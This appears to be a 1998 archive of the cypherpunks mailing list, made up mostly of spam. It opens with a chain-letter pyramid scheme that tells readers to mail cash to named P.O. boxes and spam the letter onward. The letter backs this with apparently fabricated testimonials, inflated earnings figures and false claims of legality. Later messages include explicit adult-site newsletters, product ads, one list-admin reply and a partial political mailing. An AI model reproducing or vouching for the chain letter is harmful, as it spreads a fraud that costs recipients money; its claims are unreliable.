ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to nothing to produce and e-mail. 
As with all multi-level businesses, we build our business by recruiting new partners and selling our 
products.  Every state in the U.S. allows you to recruit new multi- level business online (via your 
computer).

The products in this program are a series of four business and financial reports costing $5.00 each.  
Each order you receive via "snail mail" will include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!  The $5.00 is yours!  This 
is the EASIEST electronic multi-level marketing business anywhere! 

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if you don't order them).
     
     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE 
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose 
        name appears on the list next to the report.
  
     *  When you place your order, make sure you order each of the four
        reports.  You will need all four reports so that you can save them
        on your computer and resell them.

     *  Within a few days you will receive, via e-mail, each of the four reports. 
         Save them on your computer so they will be accessible for you to send 
         to the 1,000's of people who will order them from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed next 
     to each report, or their sequence on the list, in any way other than is
     instructed below in steps "a" through "d" or you will lose out on the
     majority of your profits.  Once you  understand the way this works, you'll 
     also see how it doesn't work if you change it.  Remember, this method 
     has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name and address 
         under REPORT #1 with your name and address, moving the one that 
         was there down to REPORT #2.  

    c.  Move the name and address that was under REPORT #2 down to 
         REPORT #3.  

    d.  Move the name and address that was under REPORT #3 down to 
         REPORT #4.  

    e.  The name and address that was under REPORT #4 is removed from
         the list and has NO DOUBT collected their 50 grand.

Please make sure you copy everyone's name and address ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and save 
     it to your computer.  Make NO changes to the instruction portion of this 
     letter.
  
4.  Now you're ready to start an advertising campaign on the
     WORLDWIDE WEB!  Advertising on the WEB is very, very inexpensive,
     and there are HUNDREDS of FREE places to advertise. Another
     avenue which you could use for advertising is e-mail lists.  
     You can buy these lists for under $20/2,000 addresses or you
     can pay someone a minimal charge to take care of it for you. 
     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them the report
     they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE 
     ON ALL ORDERS!  This will guarantee that the e-mail THEY send out,
     with YOUR name and address on it, will be prompt because they can't
     advertise until they receive the report!

------------------------------------------
AVAILABLE REPORTS
------------------------------------------
***Order Each REPORT by NUMBER and NAME***

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT 
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL 
-  Make sure the cash is concealed by wrapping it in at least two sheets of paper  
-  On one of those sheets of paper, include: (a) the number & name of the report you are ordering, (b) 
your e-mail address, and (c) your postal address.
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 

ORDER REPORT #1 FROM:  
	VTM Services
	P.O. Box 3691
	Ventura, CA 93006
___________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:
 	KL Marketing
            5225 Blakeslee Ave. Ste. 149
            North Hollywood, CA 91601
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
 	AIK
            10629 Woodbridge Ave. Ste. 104
            Toluca Lake, CA 91602
_________________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
 	RCC Enterprises
            24303 Woolsey Cyn. #1
            West Hills, CA 91304      
_________________________________________________________________
--------------------------------------------------------------------------------------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
--------------------------------------------------------------------------------------------------

Let's say you decide to start small just to see how well it works. Assume your goal is to get 10 people 
to participate on your first level. (Placing a lot of FREE ads on the internet will EASILY get a larger 
response.) Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline 
members.  Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with $5...........................................$50
2nd level--10 members from those 10 ($5 x 100)..................$500
3rd level--10 members from those 100 ($5 x 1,000)..........$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
                                                   THIS TOTALS        ----------->$55,550

Remember friends, this assumes that the people who participate only recruit 10 people each.  Think 
for a moment what would happen if they got 20 people to participate!  Most people get 100's of 
participants! THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can afford $20). You obviously 
already have an internet connection and e-mail is FREE!!! REPORT#3 shows you the most 
productive methods for bulk e-mailing and purchasing e-mail lists.  Some list & bulk e-mail vendors 
even work on trade!

About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow 
     the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them when 
    the orders start coming in because:

When you receive a $5 order, you MUST send out the requested product/report to comply with the 
U.S. Postal & Lottery Laws, Title 18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. 
Code, also Code of Federal Regs. vol. 16, Sections 255 and 436, which state that "a product or 
service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow the 
    instructions exactly, the results WILL undoubtedly be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

Follow these guidelines to guarantee your success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks, continue advertising until you 
do.  Then, a couple of weeks later you should receive at least 100 orders for REPORT #2.  If you 
don't, continue advertising until you do.  Once you have received 100 or more orders for REPORT 
#2, YOU CAN RELAX, because the system is already working for you, and the cash will continue to 
roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of a DIFFERENT report.  
You can KEEP TRACK of your PROGRESS by watching which report people are ordering from you.  
If you want to generate more income, send another batch of e-mails and start the whole process 
again!  There is no limit to the income you will generate from this business!

NOTE:  If you need help with starting a business, registering a business name, how income tax is 
handled, etc., contact your local office of the Small Business Administration (a Federal agency) for 
free help and answers to questions. Also, the Internal Revenue Service offers free help via 
telephone and free seminars about business taxes.

*******T  E  S  T  I  M  O  N  I  A  L  S*******

     This program does work, but you must follow it EXACTLY!  Especially the rule of not trying to 
place your name in a different position, it won't work and you'll lose a lot of potential income.  I'm 
living proof that it works.  It really is a great opportunity to make relatively easy money, with little cost 
to you.  If you do choose to participate, follow the program exactly, and you'll be on your way to 
financial security. 
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in Bel-Air, MD. I am a cost accountant with a major 
U.S. Corporation and I make pretty good money. When I received the program I grumbled to Doris 
about receiving "junk mail." I made fun of the whole thing, spouting my knowledge of the population 
and percentages involved.  I "knew" it wouldn't work. Doris totally ignored my supposed intelligence 
and jumped in with both feet. I made merciless fun of her, and was ready to lay the old "I told you 
so" on her when the thing didn't work... well, the laugh was on me!  Within two weeks she had 
received over 50 responses. Within 45 days she had received over $147,200 in $5 bills! I was 
shocked!  I was sure that I had it all figured and that it wouldn't work.  I AM a believer now. I have 
joined Doris in her "hobby."   I did have seven more years until retirement, but I think of the "rat 
race" and it's not for me. We owe it all to MLM.
           Frank T., Bel-Air, MD

    I just want to pass along my best wishes and encouragement to you.  Any doubts you have will 
vanish when your first orders come in. I even checked with the U.S. Post Office to verify that the 
plan was legal. It definitely is! IT WORKS!!!
           Paul Johnson, Raleigh, NC

    The main reason for this letter is to convince you that this system is honest, lawful, extremely 
profitable, and is a way to get a large amount of money in a short time. I was approached several 
times before I checked this out. I joined just to see what one could expect in return for the minimal 
effort and money required.  To my astonishment, I received $36,470.00 in the first 14 weeks, with 
money still coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks to make up my mind to participate in this 
plan. But conservative that I am, I decided that the initial investment was so little that there was just 
no way that I wouldn't get enough orders to at least get my money back. Boy, was I surprised when 
I found my medium-size post office box crammed with orders!  For awhile, it got so overloaded that I 
had to start picking up my mail at the window. I'll make more money this year than any 10 years of 
my life before. The nice thing about this deal is that it doesn't matter where in the U.S. the people 
live. There simply isn't a better investment with a faster return.
         Mary Rockland, Lansing, MI

    I had received this program before. I deleted it, but later I wondered if I shouldn't have given it a 
try. Of course, I had no idea who to contact to get another copy, so I had to wait until I was e-mailed 
another program...11 months passed then it came...I didn't delete this one!...I made more than 
$41,000 on the first try!!
          D. Wilburn, Muncie, IN

     This is my third time to participate in this plan. We have quit our jobs, and will soon buy a home 
on the beach and live off the interest on our money.  The only way on earth that this plan will work 
for you is if you do it. For your sake, and for your family's sake don't pass up this golden opportunity.  
Good luck and happy spending!
           Charles Fairchild, Spokane, WA

ORDER YOUR REPORTS TODAY AND GET STARTED ON 
YOUR ROAD TO FINANCIAL FREEDOM!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scout@pluto.skyweb.net
Date: Sat, 10 Jan 1998 09:00:14 -0800 (PST)
To: info@lgpress4.net
Subject: Agent Scully & Pamela Anderson : EXCLUSIVE !
Message-ID: <15074286123.AV35443@lgpress4.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: e7L0yp5sK@pobox.com
Date: Tue, 6 Jan 1998 20:18:43 -0800 (PST)
To: sound-of-music@sound-of-music-1234u.com
Subject: Season Greetings From The 'Sound Of Music Palace'
Message-ID: <i012k9D7082249>
MIME-Version: 1.0
Content-Type: text/plain


                                            SCHLOSS
                                     LEOPOLDSKRON

The most unique venue of its kind, situated in Salzburg - Austria, 
the very heart of Europe, welcomes you. 

The palace was built in 1740 as a summer residence for the 
Archbishop Leopold Firmian, and purchased by Max Reinhardt, 
the renowned theater director and co-founder of the Salzburg 
Festival, in 1918. When it was featured in the film "The Sound 
of Music", SCHLOSS LEOPOLDSKRON became famous 
throughout the world.

Today, the magnificent historic ambiance and its up-to-date 
infrastructure make SCHLOSS LEOPOLDSKRON an ideal site 
for residential conferences and seminars, and a particularly 
attractive destination for incentive and special interest group 
travelers visiting Mozart's place of birth.  

On request, we put together for you suitable incentive packages 
that include on- and off-site activities, such as visits to the 
Salzburger Festival or other cutural events, a day-trip to the lake 
district, a concert or a gala diner at the palace, for instance. 

For further details and information about the conference, 
banqueting, and incentive facilities of SCHLOSS 
LEOPOLDSKRON, please contact us at the following 
numbers or fax back to us the completed reply section:

Telephone: ++43 662 839830
Fax: ++43 662 839837   
E-mail: slcc@salsem.ac.at
Internet homepage: <http://www.salsem.ac.at./conference/>      	
__________________________________________________
REPLY SECTION (please tick as appropriate)

Please provide me with more detailed information on the following:

___     Accommodation Facilities   	

___     Conference and Seminar Facilities

___     Banqueting and Incentive Facilities	

___     Tailor-made Programs and Events

___     Music & Culture in Salzburg

___     Other__________________________________________
   
___    Yes, please keep me regularly up-to-date with the latest
           information by fax / e-mail / letter (please circle)

 Person of Contact / Comments___________________________              
    __________________________________________________


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This ad was sent to you by S. Direct Marketing. If you would like
more information on our software and email services...Please
call 510-653-4709  9am to 9pm California time 7-days a week.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: works4me@ix.netcom.com
Date: Tue, 6 Jan 1998 21:28:40 -0800 (PST)
To: Friend@public.com
Subject: Happy New Year!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


OnLineNow wishes you a Happy and Prosperous 1998.

OnLineNow World Wide Directories
http://onlinenow.net/frames/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ffd5367@hotmail.com
Date: Tue, 6 Jan 1998 07:09:20 -0800 (PST)
To: myfriends@aol.com
Subject: This really is absolutely incredible!
Message-ID: <78203468_1696351>
MIME-Version: 1.0
Content-Type: text/plain



Work SMART......not hard!

You can easily make hundreds a week just passing out this 800 number with your code 
number.   Some are even making thousands a week.  It is the easiest money that I have
ever made!

The company does the selling for you,  closes the deal,  and sends you $100 for every 
sale!  There is even a built in residual that goes with it.  I have done a lot of programs
but NOTHING comes close to this!

Don't miss this opportunity! Call now!

1-800-811-2141   Code #44737  (This is HOT!  If it is busy, keep trying).

In Canada call 1-800-588-9786  Code #44737

 This company has been in business for 2 years..

*****************************************************************************
To be removed from this list please reply to this message with "remove" in the subject field.
*****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Wed, 7 Jan 1998 00:42:43 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Wed Jan 7 '98
Message-ID: <19980107081612.27681.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Wednesday's issue of Eureka!

ULTIMATE HARDCORE
If you're  looking for  over 200  live  strip  shows and sex
crazed  video feeds  - 24 hours  a day!  -  thousands of XXX
photos - hundreds of Videos (Avis, Movs and Mpegs) - and all
totally free for a trial period,  then look no further.  The
only place you need to visit is Ultimate Hardcore. TRY FREE!
.. http://www.mr-cash.com/cgi-bin/ult-program.cgi/raw_3171/A

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

AFTER-HOURS NETWORK
Hmmmm, not a bad site!  "Hot Glamour Models in the Nude" yup
that's what they have.  Lots of real pretty women, bent over
and looking at you.  These are the "show me  your tits" kind
of great pix everyone really digs. This site loads fast too!
After-Hours Network ............ http://www.after-hours.net/

BOOMBASTIC
This website features some nasty looking babes.  These women
are the model variety.  The webmaster has been hard at work.
They have devised a clever system of  displaying random pix!
You don't even have to touch the keyboard.  Lego that mouse!
Boombastic ................ http://205.246.63.10/boombastic/

EMO SLAMMER'S IMAGE GALLERY
This site is a must see, they  have it all.  Including, anal
action, cum close, fetish fun, finger fling, gay guys, group
gropes, lesbian lovers and a whole lot more! There are 100's
that's right I said  100's.  Hit the "on parade" links for a
slide show. Super cool use of technology. Smack your monkey.
Emo Slammer's ............. http://www.znd2.net/karpo/site1/

HUMPING & PUMPING
Great use of thumbnails!  Lots of  horny slut pix!  One that
warrants  mentioning has a bush the size of a  muscrat.  You
have to see this. Is it a critter, or does she have the big-
gest bush in the history of beaver? Judge this for yourself. 
Humping & Pumpin ............. http://www.luvgun.com/pumpin/

FREE CONTEST
Are you ready to win another Free 3 month Mebership to Hard-
CoreSmut? A $75.00 Value.  Just visit HardCoreSmut and click
on 'Free Guided Tour'. In the 'Interracial' section tell us:
"how many free Interracial samples  you get" ...............
............................ mailto:cont-wed@www.usachat.com
................................ http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Six free feeds ..................... http://207.136.152.129/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
MICHELLE: This young lady's beauty is startling!  With long,
shapely legs,  perfect (REAL) breasts,  and a great "tushy",
this girl is the perfect package!  Not only is she a looker,
but she is a true amateur.  Her page started out  as a home-
work assignment from school, now the site is her sexual out-
let to the world!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
TabooStories.com: Nasty  alert!  TabooStories.com  gives you
the hardest, nastiest sex stories  on  the net, all free! We
have the stories that the  other  sites  don't dare to post!
Don't say we dindn't warn you.. http://www.taboostories.com/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?070
Pic  2 ........................... http://137.39.63.229/?071
Pic  3 ........................... http://137.39.63.229/?072
Pic  4 ........................... http://137.39.63.229/?073
Pic  5 ........................... http://137.39.63.229/?074
Pic  6 ........................... http://137.39.63.229/?075
Pic  7 ........................... http://137.39.63.229/?076
Pic  8 ........................... http://137.39.63.229/?077
Pic  9 ........................... http://137.39.63.229/?078
Pic 10 ........................... http://137.39.63.229/?079

PLEASE VISIT THIS EUREKA! PARTNER SITE
SINFUL'S 20 FREE XXX PICS
http://www.sinful.net/cgi-bin/topvlog.cgi?eureka
20 FREE HARDCORE, CUMSHOT, GROUPSEX, AND FREE ANALSEX PHOTOS
UPDATED WEEKLY PLUS LINKS TO 700+ FREE ADULT PICTURE SITES.
CATEGORIES INCLUDE: ASIAN, HARDCORE, SOFTCORE, BABES, AND
PIC LINKS. YOU GET ALL OF THIS FOR FREE!! VISIT US NOW!!
===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tozumi44@msn.com
Date: Wed, 7 Jan 1998 04:52:58 -0800 (PST)
To: tozumi44@msn.com
Subject: Seeking Environmentally Friendly People ?
Message-ID: <199801072011BAA12986@post.metoc.ns.doe.ca>
MIME-Version: 1.0
Content-Type: text/plain


				Welcome to the 21st Century
Whoever gets in on the front end of this paradigm shift stands to make alot of money!
		  Helps Us Replace a $20 Billion Industry (Laundry Detergent)

The ULTRA 7 LaundryMaster System replaces Laundry Detergent, Fabric Softener, Bleach & Stain Remover Forever.(Sugg. Retail $89.95)
	*NO MORE DETERGENT *NO MORE FABRIC SOFTENER 
	*NO BLEACH *NO STAIN REMOVER *CHEMICAL FREE WASHING 
	* NO MORE POLLUTION *SAVES THE ENVIRONMENT 
	* EXTENDS LIFE OF YOUR CLOTHES  *60% LESS LINT 
	*100% HYPOALLERGENIC *SAVES MONEY *Only 4 CENTS PER DAY 
	* 7 YEAR PRODUCT WARRANTY.-PRODUCT LAST FOR 7 YEARS..		
	
We can truly get you making money with this program and you will be doing your part to make the Earth a safer, better place for us and our children to live.  I apologize for any inconvenience and hope to hear from you soon.. Please, serious inquires only.

Best Regards,
L. Crowder
President 

Help Protect The Earth's Water Sup




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pads@mouse.com
Date: Wed, 7 Jan 1998 20:19:01 -0800 (PST)
Subject: Personalized Mouse Pads
Message-ID: <eaep.3.0.reg.SteIUZ.35802.8461125@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



     Have you ever wondered why your mother gave you the name she did?  Were you named after 
a close relative, family friend or possibly a television celebrity?  

     Well, we can't tell you why either!  However, what we can tell you is exactly what your name 
means!  

     We print your name and it's meaning on an attractive mouse pad with a custom art background 
of vibrant colors and scenery.  Not only is it pleasant to look at, but everytime you sit down to your 
computer, you'll be reminded of just how great you are. 

     We have the largest most comprehensive database of names anywhere.  And we can print 
names in both Spanish and English.

     We are so sure you'll be pleased with your personalized mouse pad, that we offer a 30 day 
unconditional money back guarantee.

     Placing your order is easy too!  Just complete the order form below and mail it along with just $10 
plus shipping and handling. (see below), and we will rush your personalized mouse pad by first class 
mail. 

     Choose your background preference!!

ABC BLOCKS                                         ANGELS                                         CLOUDS   

DOLPHINS                                            PRAYING HANDS                          SPORTS 

TEDDY BEAR                                        UNICORN                    or               WATERFALL

                                                              EASY ORDER FORM   

NAME REQUESTED                            MALE/FEMALE                               BACKGROUND PREF.

_________________                            ____________                     ________________________

_________________                            ____________                     ________________________

_________________                            ____________                     ________________________

QUANITY ORDERED_______________                  AMOUNT SENT$_______________

CASH CHECK OR MONEY ORDER'S ONLY!!!!                       US FUNDS ONLY!!!!!!!

USA MAILORDERS $12 EA                                   ALL OTHER ORDERS $14 EA
(includes $2 shipping/handling charge)                   (includes $4 shipping/handling charge)

MOST ORDERS SHIPPED WITHIN 48 HOURS.  IF  PAYING BY CHECK,  YOUR ORDER WILL 
BE SENT IMMEDIATELY FOLLOWING BANK APPROVAL.

PLEASE MAIL YOUR ORDER TO:       3J PRODUCTS
                                                               PO BOX 7183
                                                               OXNARD CA 93031

              





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 8 Jan 1998 02:58:15 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Jan 8 '98
Message-ID: <19980108082356.29649.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

HARD CITY
Ouch! Like it's name says, this is a HARD site, or at least,
*you'll*  be hard  after you  see it!  Hard City is superbly
constructed and has  just about every type of porn you could
want,  and what's more,  we've arranged  for all our Eureka!
readers to  get to try  out the site totally FREE of charge!
So what are you waiting for? Go see! .. http://hardcity.com/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

BEST SEX MOTEL
Somebody is  always in at the Motel and the rooms are cheap.
Surf down the page to the "rooms", there you'll find a bunch
of great  pussy pix of all sorts.  Nice  nipple ring room1b!
Best Sex Motel ................... http://www.sex-motel.com/

LICKITY SPLIT
Oh yeah, what a superb site. You are really going to love all the
photos and links you find here. Absolutely excellent!
Lickity Split ............... http://207.254.20.141/lickity/

L.A. SEX
"L.A. SEX has been designed for easy surfing but more impor-
tant than that we have a ton of great free nude xxx pics for
your pleasure! This site has no  consoles..."  You bet, this
is a great site.  Shaved,  black or redheads, take your pic.
L.A. Sex ...................... http://209.50.230.238/pk.htm

SABRINA'S HOUSE OF HARDCORE FUN
They has  gathered together dozens of free pix for us.  Once
there you have a lot of choices. They offer a free video for
us as well!  Not a bad deal.  Pretty  juicy stuff.  Facials,
young  women and asians.  Lick it up girls!  Worth the Surf!
Sabrina's House ............ http://www.sexhost.net/sabrina/

FREE CONTEST!
The excitement  escalates!  This week's  competition now has
just has two free 3 Month  memberships to the King of "Hard-
Core" left to play for.  Eureka's Halarious  question master
awaits you.  Visit  Hardcoresmut  and click on  "Free Guided
Tour"  for the tour,  and email us  the answer (found in XXX
CHAT) to this head-scratching question:  "What does everyone
want to get in the XXX Hardcore chat rooms?" ...............
Answers to .................. mailto:contest@www.usachat.com
HardCoreSmut ................... http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Three dicks .................... http://207.168.184.26/trip/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
LEATHER ROSE: A busty Bi-BBW woman who is NOT afraid to show
off. She considers herself an "eclectic kinda gal with ecce-
ntric tastes",  and believe us,  she has a  lot of loving to
give. Her web page is devoted to her, and fans of BBW women.
Check out her site!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
HotStories.com: Tired of all  those  pics?  Hot Stories lets
you use your imagination to is full potential. Over 100 free
sex stories in 8 different categories. Our stories are worth
a thousand pics! ................ http://www.hotstories.com/

DAILY MPEG AND CARTOON
The  internationally  renowned erotic  artist Raffaelli  has
made his  award-winning videos available exclusively to Eros
in  Orbit  and NOW  to subscribers  of Eureka!  These  high-
quality video  clips feature the  best of Raffaelli's erotic
masterpieces.  Raffaelli has  gained world  wide recognition
for his quality productions, featuring beautiful non profes-
sional  models  captured  in passionate  sexual intercourse.
These video clips also  portray exotic single girls in auto-
erotic masturbation.  The color, quality and detail of these
MPEGs is superb. ........ http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ....... http://www.adultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?080
Pic  2 ........................... http://137.39.63.229/?081
Pic  3 ........................... http://137.39.63.229/?082
Pic  4 ........................... http://137.39.63.229/?083
Pic  5 ........................... http://137.39.63.229/?084
Pic  6 ........................... http://137.39.63.229/?085
Pic  7 ........................... http://137.39.63.229/?086
Pic  8 ........................... http://137.39.63.229/?087
Pic  9 ........................... http://137.39.63.229/?088
Pic 10 ........................... http://137.39.63.229/?089

PLEASE VISIT THIS EUREKA! PARTNER SITE
A Babe For You - 350+ FREE Naked Babes
http://www.babes4free.com
350+ FREE Quality Blonde, Teen, Lesbian, Teen Fuck, Asian,
Black and Series Pics. All thumbnail selection. Plus we
feature Free Pics from Free Sites.

===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 8 Jan 1998 13:43:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: lists
In-Reply-To: <19980107200049.20317.qmail@nsm.htp.org>
Message-ID: <3.0.5.32.19980108131127.008934a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:00 PM 1/7/98 -0000, nobody@nsm.htp.org wrote:
>Can someone tell me if the toad cypherpunk list gets *all* the 
>cypherpuink traffic?  As I understand it there are three
>possible subscription points -- does one subscription cover
>all?

You can't subscribe to cypherpunks-request@toad.com any more,
but mail sent there will still get forwarded to the other
mailing lists, all of which send all mail to each other
(except when they're broken, which isn't very often.)

cypherpunks-request@
	cyberpass.net
	algebra.com
	ssz.com
	htp.org

should all get you help for using their subscription mechanism
(usually majordomo or another listserv.)
	
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "TVID" <tvid60@hotmail.com>
Date: Thu, 8 Jan 1998 16:53:29 -0800 (PST)
To: Friend@public.com
Subject: Television Caller ID
Message-ID: <234a8sdf67q2348r@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


The TVMessenger utilizes the powerful medium of Television to display Telephone Caller ID information. 
While watching your favorite movie or TV show, the TVMessenger will display incoming callers name 
and number in the upper left hand corner of your TV screen. 

This convenient easy-to-read caller display lets you make an immediate decision on how to handle the 
call. In addition, the TVMessenger keeps track of your calls while your away. The callers name, number, 
date, time, and the number of times they have called are stored in the callers log for future reference - 
Ideal for number retrieval! The TVMessenger also works with your voice messaging service - it provides 
a visual indication that a message is waiting. 


CONVENIENCE     *     SECURITY     *     CALLERS LOG     *     MESSAGE WAITING/NEW CALL INDICATOR


REPLY to this email, visit our Website or CALL US for details TODAY!!


_______________________________________________
http://www.promobility.net/tvid/

Tel. 888-632-1310






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Thu, 8 Jan 1998 00:50:21 -0800 (PST)
To: (Recipient list suppressed)
Subject: 1998 - the year we must make a stand.
Message-ID: <1.5.4.16.19980108180000.41efa41c@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------------

PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return the message
in the body of this email (so that we can track your state).

----------------------------------------------------------------------------

Dear One Nation Supporter in New South Wales,

As Australia moves towards the year 2000 we Australians move into a critical
stage of our history.

A stage which is the culmination of years of deception by the Labor and
Coalition parties leading to the undermining of our democracy.

With a Federal Election in the wind 1998 provides a chance for Australians
to rectify the wrongs of the past. Voting for the major parties will provide
no solutions - only more of the same. However, expect the major parties to
claim that voting for Pauline Hanson's One Nation will be a wasted vote.

They are wrong - tell your friends and make a stand for your children's
future by voting for Pauline Hanson's One Nation.

I am going to cite just one example of many on how you, as an Australian
